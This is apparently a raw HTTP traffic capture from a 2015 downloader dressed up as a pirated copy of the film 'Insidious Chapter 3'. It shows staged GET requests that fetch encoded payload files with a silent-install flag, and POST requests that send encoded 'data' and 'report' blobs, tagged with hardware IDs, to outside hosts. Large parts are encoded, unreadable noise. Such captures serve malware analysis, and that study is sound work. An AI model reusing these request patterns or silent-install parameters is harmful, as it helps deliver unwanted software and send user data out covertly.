..p.k.A.O.a.D.W.Q.h.y.e.P.w.e.o.1.2.3.j.k.8.O.0.c.S.7.I.R.F.O.I.L.M.K. .T.o.3.Z.x.6.Z.C.Y.H.J.I.h.Q.e.c.4.0.y.K.n.P.e.Q.v.l.e.X.m.N.g.Q.c.Z.3.2.Y.l.0.2./.3.d.F.X.l.2.2.i.u.I.K.l.4.Y. .A.a.e.T.0.C.F.f.s.x.x.B.p./.T.x.k.H.S.8.O.s.y.G.h.y.z.h.t.i.R.D./.M.E.R.v.6.8.N.M.U.S.O.b.x.j.q.a.C.e.e.F.I.i.c.b.x.I.f.J.f.Z.9.2.V.9.w.h.x.S.0.m.I.l.t.U.n.l.d.S.n.9.J.m.J.n.A.q.B.A.4.0.c.o.J.r.H.l.Q.4.Q.T.y.O.J.K.d.7.W.o.h.z.f.x.Y.B.v.N.h.z.T.T.b.h.x.c.I.C.Y.Q.y.q.y.N.n.g.r.n.4.S.g.9.b.F.B.U.0.i.q.Y.z.1.P.7.F.j.v.l.9.4.L.j.e.b.6.v.6.6.p.w.s.v.L.H.o.a.0.y.i.v.G.I. .Z.j.P.x.E.Q.z.8.V.U.g.p.Z.q.T./.H.W.1.D.W.V. .u.A.e.q.7.3.M.f.Q.4.c.6.D.r.a.q.1.H.e.z.8./.J.F.Y.c.J.8.k.w.t.m.N.f.W.I.q.U.F.J.5.R.h.K.P.T.n. .M.U.Z.b.P.K.L.D.j.2.4.x.J.L.9.9.A.e.G.K.f.3.Y.M.h.V.0.k.Q.F.k.T.x.Y.m.U.T.8.Z.6.1.F.m.1.I.F.B.P.i.e.0.J.Y.U.u.z.7.7.l.3.v.z.W.R.J.X.P.0.A.n. .o.p.3.5.8.K.3.j.C.D.e.c.h.g.3.g.9.c.D.N.s.B.L.J.E./.P.U.k.2.C.j.C.Q.s.T.2.z.D.g.N.y.U.b.S.7.A.g.J.4.p.t.i.B.G.p.2.Z.V.Y.x.2.3.d.H.e.U.W.m.G.L.R.1.d.G.2.I./.6.g.P.J.u.n.Q.2.B.L.S.K.y.X. .z.s.L.Q.p.8.H.l.l.x.4.O.4.7.7.1.t.M.L./.J./.f.9.c. .Q.7.T.3.g.R.s.s.j.1.g.d.a.3.5.Y.y.i.X.I.k.r.w.I.D.d.q.s.P.P.n.6.1.V.T.x.x.T.Z.4.Z.I.i.4.I.o.t.Y.V.c.0.U.5.L.e.h.e.W.O.b. .u.x.Z.s.E.R.3.B.5.g.o.W.x.0.P.T.5.q.k.9.i.K.Y.B.X.V. .0. .5.P.G.K.8.s.x.Y.9.b.k.A.a.W.x.a.I.6.2.K.z.9.Q.v.F.G.U.H.J.g.7.T.l.x.z.H.O.K.e.p.5.U.M.K.Y.P.3.M.x.G./.Z.N. .r.6.q.L.R.l.b. .m.z.2.U.e.x.a.v.3.Q.3.N.a.T.q.B.W.f.f.W.r.s.w.B.a.Y.L.Z.d.F.E.S.0.4.y.T.0.q.k.H.1.2.G.m.V.O.7.r.p.8.W.T.C.D.a.8.U.L.P.t.G.S.g.J.B.m.o. .l.7.k.i.D.r.e.S.q.D.i.

<<< skipped >>>

GET /?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:06 GMT

Content-Type: text/html

Content-Length: 8364

Connection: close

Content-Disposition: attachment; filename="4_2.txt"

..O.V.v.c.E.m.j.2.Y.Z.n.7.y.k.b.c.d.e.p.Z.W.O.q.Z.2.l.f.U.C.Y.h.2.J.6.e. .z.8.u.y.6.g./.k.d.U.R.j.D. .Z.o.R.d.N.E.D.J.T.8.d.P.q.z.i.5.V.8.j.e.R.e.5.X.o.6.X.h.W.W.N.f.T.T.J.g.Q.L.Z.5.3.t.g.K.H.E.0.t.P.t.K.V.L.7.E.L.Q.f.V.l.h.5.A.z.w.u.D.P.t.B.9.f.c.1.Y.k.K.v.2.Z.c.A.l.a.u.M.d.L.k.M.V.C.S.T.L.P.1.C.Q.s.P.R.s.3.A.I.H.x.N.6.e.4.8.f.V.n.9.p.P.x.k.Y.S.p.b./.l.V.n.G.u.s.S.H.g.6.x.5.K. .3.c.O.D.L.T.m.H.W.2.2.7.q.P.C.7.0.r.a.w.t.P.i.d.5.e.j.0.Z.m.k.y.1.b.O.0.E.E.c.3.z.D.r.9.w.a.E.u.V.y.q.k./.D.D.d.N.E.a.P.O.0.W.1.S.k. .5.p.V.G.W.M.G.t.B.D.z.q.i.G.5.U.j.K.q.c.P.W.n.U.R.S.i.B.A.O.Z.6.W.b.g.4.y.3.z.A.l.9.y.V.6.W.3.U.V.3.L.p.Y.d.J.F.Q.7.x. .i.j.0.j.9.c.7. .p.Z.t.A.6.8.E.r.D.b.z.c.F.r.j.P.3.g.z.4.q.A.Y.2.s.r.e.O.s.u.7.f.N.g.l.J.X.2.H.1.f.Z.o.0.q.V.Q.F.r.c.V.8.j.1.j.k.x.8.2.f.r.E.P.B.U.X.5.B.Z.J.s.T.F.u.e.Y.1.B.j.2.A.j.m.p.z.B.5.s.s.2.K.D.z.1.e.v.M.F.M.k.Q.Q.l.t.s.6.4.Z.x.d.6.l.r.j.9.a.K.2.O.h.H.u.b.O.r.2.g.C.i.0.2.K.l.l./.m.e.K.a.M.f. .5.j./.X.P.3.n.J.3.p.X.I.n.b.C.w.U.b.d. ./.N.n.6. .U.O.6.8.G.8.7.j.q.K.p.F.W.X. .W.R.0.1.7.c.r.o.t.a.N.P.L.X.z.8.Q.g.x.w.j.i.b.T.R.L.m.a.A.a.U.V.z.u.s.B.x.1.G.l.4./.p.r.O.R.3.l.4.X.2.H.N.I.k.A.z.f.9.o.h.T.E.A.j.B.B.Q.E.v.A.x.J.7.d.i.Y.A.t.T.3.a.X.J.f.s.O.6.j.S. .7.a.E.e.S.8.M.E.b.o.y.f.v.V.v.E.2.G.Z.B.d.V.I.Z.C.v./.q.r.m.U.C.u.j.7.G.F.Z.E.p.i.Z.M.B.F.E.5.f.3.c.X.H.Z.G.k.z.E.h.u.5.p.p.S.4.P.N.p.V.t.b.q.P.U.G.2.Z.G.6.2.j.p.Z.n.a.K.W.H./.J.w.S.p.t.s.i.E.1.O.A.c.F.t.4.H.Y.M.8.7.r.G.E.A.V.0.c.d.s.m./.N.I.N.d.g.5.t.U.V.V.6.h.J./.G.Z.d.U.J.I.6.u.Z. .2.8.b.f.v.f.n.S.m.S.T.S.5.d.z.w.g.s.Z.C.6.q.f.u.X.G.

<<< skipped >>>

GET /?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:05 GMT

Content-Type: text/html

Content-Length: 8366

Connection: close

Content-Disposition: attachment; filename="4.txt"

..s.O.b.W.Y.G.f.T.a. .v.0.u.8.g.B.C.D.2.j.m.N.x.3.5.X.l.6.G./.o.m.F.2.5.K.a.I.h.7.x.i.u.d.S.X.g.z.6.K.K.f.Y.p.k.6.w.H.i.k.F./.M.m.p.l.F.9.G.W.u.M.w.a.L.7.D.O.W.A.T.r.N.a.Y.B.S.T.q.y.1.z.K.c.U.W.b.F.s.H.O.M.3.5.k.o.3.e.o.a.D.K.6.z.e.R.u.c.s.y.D.g. .p.u.P.q.8.I./.g.D.t.V.j.n.i.s.V.L.p.F.c.G.e.r.f.x.w.h.K.q.k.f.C.d.r. .T.7.Q.d.a.Y.H.W. .E.g.N.q.9.j.E.K.t.s.H.3.T.7.l.f.k.h.E.Z.s.e.s.s.X./.l.M.A.0.3.a.g.y.i.V.7.n.0.U.0.D.G.9.Z.w.T.K.x.E.B.c.u.y.p.A.J.y.D.S.q.G.E.Q.5.9.G.s.4.i.Y.9.y. .C.I.a.O.E.e.u.8.z.n.8.A.S.L.S.j.v.W. .L.J.7.5.M.t.V.u.l.b.A.L.u.9.R.h.7./.F.L.9.G.8.h.f.t.h.z.N.T.O.m.K.g.W.h.T.F.r. .w.0.h.u.4.M.6.9.3.f.w.9./.0.n.R.R.4.4.R.A.o.l.p.G.h.6.6.N.w.n.p.K.H.g.s.Z.Z.C.D.G.l.e.X.9.F.9.Y.W.u.7.X.P.Z.1.0.l.2.h.0.Y.d.S.l.h.c.n.n.X.h.w.b.5.U.u.k.A.R.5.Y.O.n.4.R.o.k.L.c.V.i.c.F.s.R.c.N.n.u. .W.s.P.C.3.m.9.6.g.b.m.M.g.G.i.F.3.p.Z.E.4.J.D.7.Q.v.R.o.R.h.v.E.J.R.C.y.w.6.N.R.U.M.c.v.M.Z.Z.L.Z.E.T.F.L.4.b.t.m.1.C.G.z.f.w.T.C.x.8.h.h.Z.p.w.M.Z.N.r.D.J.q.q.K.r.0.8.L.6.i.S.p.r.H./. .D.x.9.h.H.i.w.H.T.v.T.g.9.i.F.Q.J.A.k.7.v.N.n.a.U.y.J.8.U.7.v. .3.u.i.I.2.T.3./.g.O.n.L.F.Y.K.z.d.G.g.j.h.h.J.m.W.h.h.F.W.N.K.Z.E.H.v.B.N.u.h.B. .W.i.R.6.d.x.z.G.d.Y.G.8.w.h.m.r.Q.K.i.M.b.A.s.d.L.1.Y.A.D.P.R.z.N.s.u.w.g.9.9.9.6.G.7.t.o.c.Q.g.g.j.1.s.o.r.2.W.a.C.G.D.I.C.h.L.o.P.J.r.m.0.I.k.0.X.t.N.X.Q.l.r.b.E.o.Z.g.d.8.1.b.M.K.u.q.9.I.X.N.C.E.w.m.2.h.O.V.x.p.l.l.7.5.4.U.F.M.z.u.8.T.J.u.8.E.j.E.p.U.E.4.7./.Z.M.f.p.4.6.W.L.B.V.l.M.w.q.7.U.V.9.K.Q.L.g.N.P.w.J.z.0.J.C.T.4.1.m.3.x.g.k.e.z.L.x.K.p.o.E.c.s.l.r.6.c.l.C.f.d.Y.0.g.P.r.x.O.w.k.l.G.1.U.t.R.

<<< skipped >>>

GET /?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:07 GMT

Content-Type: text/html

Content-Length: 6714

Connection: close

Content-Disposition: attachment; filename="5.txt"

..c.p.B.Q.b.W.Y.K.i. .K.1.Y.L.w.L.F.H.C./.1.E.V.v.3.r.q.Q.p.O.q.n.m.J.w.9.D.I.V.r.u.p./.h.S.a.2.C.V.R.T.I.m.F. .7.6.f.e.W.1.2.h.m.b.O.5.X.O.N.F.0.x.C.1.m.O.G.0.D.T. .f.a.n.G.W.Z./.v.2.g.R.o.N.X./.1.S.B.b.I.j.c.e.A.R.f.u.l.B.0.i.c.u.B.i.c.3.D.2.h.G.1.m.n.1.L.6.k.h.q.H.d.9.l.m.J.q.l.M.2.r.O.2.Y.U.s.T.s.f.n.x.C.8.d.z.w.I.h.s.Q.j.O.O.S.D.l.3.e.F.9.6.p.m.4.k.8.9.O.6.i.a.F.3.C.X.8.t.b.E.E.M.3.4.X.B.5.i.r.p.S.M.T.3.K.V.g.7.1.t.1.b.y.2.o.N.Q.M.r.d.e.N.3.R.s.s.R.O.U./.y.b.C.s.i.P.1.M.T.W.0.y.R.N.U.W./.C.e.f.y.K.J.1.2.N.G. .u.T.s.3.D.E.X.l.U.s.j.d.C.J.Z.g.T.u.j.y.7.R.E.x.H.g.p.u.9.h.P.W.f.M.s.9.c.N.s.B.j.E.y.1.c.V.o.2.l.3.E.Y.C.j.o.D.g.U.L.L.8.s.Z.5.s.p.H.N.4.S.6.l.b.R.K.A.Y.r.3.8.6.C.9.c.w.n.r.P.z.4.E.V.K.P.s.H.p.u.x.w.h.B.r.o.B.C.5.9.w.f.9.d.T.O.7.a.9. .V.U./.G.f.B.l.e.A.o.y.F.H.e.S.G.c.0.0.5.6.K.7.B.0.2.p.0.m.V.Q.d.e.H.m.y.5.2.g.S.P.z.w.M.C.P.F.q./.z.Y.s.S.s.F.6.R.L.o.h./.w.c.4.p.d.a.G.L.r.l.I.7.s.o.4.p.S.M.X.D.M.i.5.g.L.R./.z.t.m.X.r.G.C.A.l.w./.f.g.6.K.w.u. .a.p.G.R.T.9.j.Y.l.R.8.k.r.3.p.M.s.k.s.0.1.3.w.y.8.S.c.6.g.W.K.j.1.G.k.T.0.R.f.6.7.T.k.Q.n.S.P.X.V.k.1.5.g.l.V.9.S.j.g.z.g.C.9.n.F.4.E.b.g.L. .9.B.M.4.Z.h.1.b.5.Q.N.T.D.3.7.n.M.K.F.u.8.e.S.0. .L.i.v.8.f.v.t.Y.J.e.f.z.Z.z.w.f.j.V.x.L.g.d.a.Z.l.R.V.D./.7.5.M.L.Q.t.B.r.g.N.3.P.l.8.q.0.C.8.F.F.N.U.L.t.K.O.5.s.N.n.T.Q.c.D.a.P.h.h.h.Y.r.R.X.u.e.z.4.O.O.w.Z.L.6.v.1.l.Z.W.r.A.Z.v.k.J.q.x.D.G.H.v.X.d.h.N. .n.A.9.V.7.z.h.6./.f.u.K.c.V.8.Q.p.T.G.0.s.n.Z.t.1.z.g.Z.n.1.X.C.E.2.s.I.P.R.A.V.B.y.z.Q.T.P.T.Q.M./.u.L.c.C.L.I.x. .d.F.d./.R.O.Z.d.h.a.1.T.S.4.u.y.L.V.r.p.u.1.t.Z.6.e.

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.the-invention.org

Content-Length: 5958

Cache-Control: no-cache

data=/Wg8/rvm30eXNBCDWYo6y&report=EoWEfO6Cpa i3NvZTV4ZYCimFI04jjvSuiR3cLYmpTZbPHy29g1HxId40XDF/bIXs6JmMFhEyrtdka6URZidHpwsRYdsErYKPOYN9M7fMp5PA2qYivrNeigFmHNOqahSB Be8CNnjLYxieXrkwcx1N7AeAGA1BUEQImrZwv3XaajCLaSKCwiIIX14fKW9nujhqLY3Zu5Y0b5K0SjQkFfaE48kKUdQtBbeXxmpFDG18jZQtzaTNjyFjCdZgWv3kJ3f893Hk9TgEl1QzRp1h0y3HKBAYezrz3xL9ZjTHNoZbH4K9TP6eqLEczHtcBFyfKPovcQxYelKRgDQe16Ymds6m18UsBVSlDEBSC3XKEjLYINMRefhZVMDCFeF6PjRrJ mV4IMcxXwoeK1uPT8AMzRWgve NsqIIMxalnqR1rcY4ys0Rs5WTn7cZbMlADVNdSUD2Yju0HaCeZD2rY1MrVQmwI85oy4LiXpGyJuqg89eIn8KeYYfQjnkopFXcX1EwZKyf2OK2h9Pyg EpQpk3FeoaLC8HZ5SXScPO2ZD3qgKgbDrbNidqrXhFfUGcMT/dxyvtcTKOFMOCGGhvGdDYNFr2P6RCk3ZAaipHsIW5qJIWK2XKzUAYNqUrHYaGaqzJJPIKTuOK7JirrVCRG81sPabzS 6zViEX FzNmqxzqFcKJoXVJuhDFI qe2wQ57HpCdDOJhYV8dSkucbxLktnWccBMG6nSUY71rEXeXVNZIOvcGOlpdS1ASO2UroNOvgunHZis1HRYN40EwNyk6zEsc2y2If RjYQZXILVKCcaAKH21Knq5uYTq0s/C1N18bXbt52X0Lx4T3Kls /y5pFktM7YgAnabbaEXFbgwJyIwod3FSWyuASo4piXZEHGAhtr1RSSjHup31CU8eY F1k/B90MQyjOAaGd 4KBF9vRCTnT6OVlAZ/tbRop08PbouNO/c52 /PGGYgpmNfHfns3OiYGqE9XrvicsYcpI ycY80JW8YHeBqY2G4eSjBE9skSoP6nHsQ3kP 6WzaxqD7nkP1kEAMqn4CgVdBKwkfXkD 8o9anUx2S5QqGQcMX8h3KZKu175ij2TtX/cyQUUpfkQdoUS8vIlYNthicK8/hDd8tHoAgEafNUU65r8pn 4U nCO0KI2RwfRrhkFOW2EfGO1jMEZ56LaNydtxSSfcP0BtRdUwFj0fZ6JbBQZ9aoACnA9QAsIfRP Bcohv45LefD1kCu5Rm1CkqNK7XOapiBj ENQGtVLnIq2B

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:34 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:07 GMT

Content-Type: text/html

Content-Length: 2734

Connection: close

Content-Disposition: attachment; filename="4_3.txt"

..l.9.w.g.P.u.r.m.L.6.d.4.n.S.O.h.a.b.H.M./.4.H.T.I.9.F.q.v.q.y.h.X.p.c.k.9.C.2.g.R.r.f.e.M.a.Y.X.q.v.f.6.S.o.G.3.r.D.r.p.0.K.O.1.r.g.r.b.u.l.u.I.F.W.Q.u.e.J.b.k.n.f.B.h.B.B.X.L.e.o.i.1.m.y.8.m.S.Y.F.S.l.I.J.m.9.O.8./.I.x.I.r.9.0.Y.3.W.k.e.y.2.t.D.5./.X.c.1.n.q.i.W.Z.j.v.t.i.l.3.w.n.H.4.M.N.v.F.2.F.6.R.W.H.G.Z.A.G.T.a. .P.9.A.6.C.g.0.i.k.t.t.T.G.d.z.7.4.U.B.K.7.M.J. .b.L.7.b.C.6.W.f.U.l.P.W.d.v.Y.E.p.r.6.L.M.o.3.W. .o.W.W.c.3.s.8.2.y.s.x.f.C.h.6.d. .7.c.I.R.d.4.z.8.B.6.p.8.s.A.7.8.Z.i.0.L.V.r.F.E.5.P.X.E.0.a.a.u.w.D.G.o.L.V.W.O.a.Z.o.E.s.q.Y.4.L.u.3.2.1.f.k.9.N.J.F.L.E.w.S.h.N.V.V.6.W.D.1.i.c.G.C.Q.F.v.h.a.g.D.v.u. .q.B.5.o.q.b.D.v.D.N.3.X.e.b.n.P.1.V.1.9.D.j.y.g.l.4.j.9.b.l.O.K.6.l.Z.Y.o.4.o.W.J.4.g.I.T./.w.N.O.q./.X.R.D.i.d.I.r.s.V.S.R.s.L.W.m.x.r.Z.d.E.b.k.G.m.p.6. .Q.z.l.g.u.Q.V.Q.v.v.f.P.F.e.w.S.a. ./.S./.e.f.r.P.e.X.8.d.u.f.S.V.K.0.E.S.v.Q.u.z.Z.o.u.D.L./.w.x.k.1.u.m.o.n.Z. .9.P.Q.5.E.1.V.q.I.6.1.O.g.J.0.i.r.q.Q.8.7.4.L.n.B.8.V.Y.4.x.3.Y.9.9.c.2.0.s.4.h.E.P.A.4.U.K.j.I.M.Y.Q./.I.V.5.y.v.c.K.3.M.5.O.u.t.1.8.C.O.d.k.K.Y.r.R.L.N.y.L.z.O.N.y.L.2.B.W.F.8.G.U.2.v.I.C.r.u.x.G.5.4.7.j.p.X.X.1.9.a.L.2.7.s.g.9.a.7.H.o.C.k.8./.Y./.i.z.W.e.s.8.6.b.B.7.f.P.B.5.b.I.F.Y.S.S.p.g.2.u.a.p.o.8.8.v.E.R.s.i.j.i.k.P./.Q.I.d.J.5.L./.Q.B.U.W.X.e.R.8.t.U.8.o.R.X.8.A.w.T.C.C.P.D.V.M.9.d.I.t.f.W.K.Z.4.B.B.X.6.7.L.o.6.k.D./.I.D.U.r.p.z.A.j.d.A.m.j.3.I.m.m.B.2.Z.3.D.E./.o.P.0.v.z.h.f.f.9.c.W.o.z.7.u.k.Z.1.T.S.5.U.d.7.S.B.4.Z.y.k.l.Q./.E./.M.I.u.n.9.t.f.J.V.4.L.p.f.h.C.L.N.M.n.y.2.T.Z.c.9.d.J.Q.2.a.4.n.5. .j.R.A.M.7.x.e.k.r.T.6.s.T.5.

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.the-invention.org

Content-Length: 5368

Cache-Control: no-cache

data=ACXF6JRElEdb1m3OabzJ3D2b5w+m8D2mXeYYaRzI1yxvnemJCt52ZBFyMtNgLpO4pLxyGsAjeqZ9OswCYbl2+jbbpPr1RyQfI3ee6GhykO3VawGEWa7pnDSSQuBaulvNJ7p7aGFXgYcpy1Q3Va8Z9z1lH5tjXJSzqEhvz1Mmk1JHLogUfHTG4O9SW8b4DDNGE5CXvVq1OfOLn3hESSnmuaV3xGFr58fqsJt3lZQaLG//sV9aZlaxP2QorO7MNUpVWN59oPiCb1bGEEQ/gR06Z+VexU0Hi+O+NbivyVWQXAzisr6D9FdBrwjxmOJcWF4ODPp8KGF9PW85BmyzcNxu0X4/Sl0zAkvi1yJyEhPST9z7ZS1gh5OqXYW9ZUxeKMkDRqRxNeweBNm7bdSzbRzpEEIdEaZb51mvpSi/HtcQNyvqEUac7jNytxQk06WVLKNvf/FGtj1JJduRfa/mSZB39gbEXetLxJWyK6Rhc/k23WQ58Yr4S7EvnwBQPTFJp7wuTVFxVIxg3+n+FMKFKK+6UXK4WHt+jLh0VFAiKV+ZZ5mHtqr77bC8UuN89eyOZr9dw1dGIOeHK3N/NeJxvtepOiJ62fXuS6y8JZgr2QdyYGCKL7W6fEE6wOns7lzghO7UZL9I85OF2vehjR1ObSAao2/TAS90vFZB9xEACm0eh1+wyF2py4V74dNue8Hmw+GBRg1xbh4B0E4wxrKpprwDfO9aug9i1RYrLwA/gkGp9SpbzIemgfyIUu0+La5MGJkHAQMLN81FAGR4BopxrV5gWdCIIUOH/nqcoQI0Mtb+F6RiwmwnigStk0p4auATkhbWwo8eZKvC0pWNy5igdXs4vYP/qaCLlnE8JBS0G3nMEp7n7nugqeiqxUciJ38yOoux7FYMRThgDBuZmfEZmMK98pj77a4/c7IqCnf703wNwpcE2TfwYmnmitHqGCF2kVuKW45LX5qq5zFRl/GQevshp2rpnf7IMCqi8svICAXLoe0q3LF/Vak8VJhO8oZDsojn3P7goiz8LeLNNCJXZ&report=/ZdSMEwjhs5jh48PRJ8mip8v1zaz/Q8ivu94Okb/5gSwlGGAuO7ilKkT47yCunU7erZ+byBdPtIeayaAqJZ8aTJqhgTuU8A3RysXRmq19j9zYa5AKLq903wDcTNPRwl7fHTkzc3j6q+L7227LVx67xiBr7WKDuvXV1dH3+AUf+jj8TUpuNuJHKuYqxCgX1clEWk8OXjIG1z+Lh+tAnr6

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:04 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /get/?data=X78R3fMJAwzVd3H678kNunVp8V2hy/MaNDVsyZviAVqUqjrH5ck2U5rxjd9CME1q/vRUebLuJ4gzt88MkyVCj4gkxrhTS3B1YdjGjV8gH7XkOuh9ahoqAMln6cbQXtJ7J+Cvlf6U4jESk+d1WJIMs+v1kvqLnq2E4QkjYp2oEA7gUDnT2juDYdGkj0Xidb77LHfOSUSz17gfggP//o0tfzmnzmKJmHXJWq8zF04py+O65cCfxslm7EIZk5SLjkyYLRw/4pUUeiwhfSIXe9gPZzy/Q8Mco3sB7HIxiWfTZdfpFYvqY3FtQ1V6+WryJeOikvizLXWStExhAKMrHdivTiqjEQHU54xDXbD5swbLVCzWpMUaIGZSU+Soqr4nGFC0LI0rIhMvXSuwZMZsMjB5DindQWf8is4ytFhtlSNxkwxVoREupyRPVZ7Wf2V5fKlOLxBTI8LpQuBE5tEGIORu1ELgKHLdRapFmsIfcWyPL9bRWFc1Qi/taCUAj+Y4w/tbwTQYv+pd6BV0Isu67h4xUqBuaJdl0m53GADkFUevx23lFBKPUJ6qeUKsK/0U51YvUlw7Fg64kF37NPJecdzX7GbWlGqTOuoFVvPu1tQccEef&version=4 HTTP/1.1

Accept: */*

User-Agent: win32

Host: techine.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:54:59 GMT

Content-Length: 0

Connection: close

GET /?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.goody-best.info

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Wed, 01 Jul 2015 04:53:36 GMT

Content-Type: text/html

Content-Length: 10242

Connection: close

Content-Disposition: attachment; filename="6_1_3.txt"

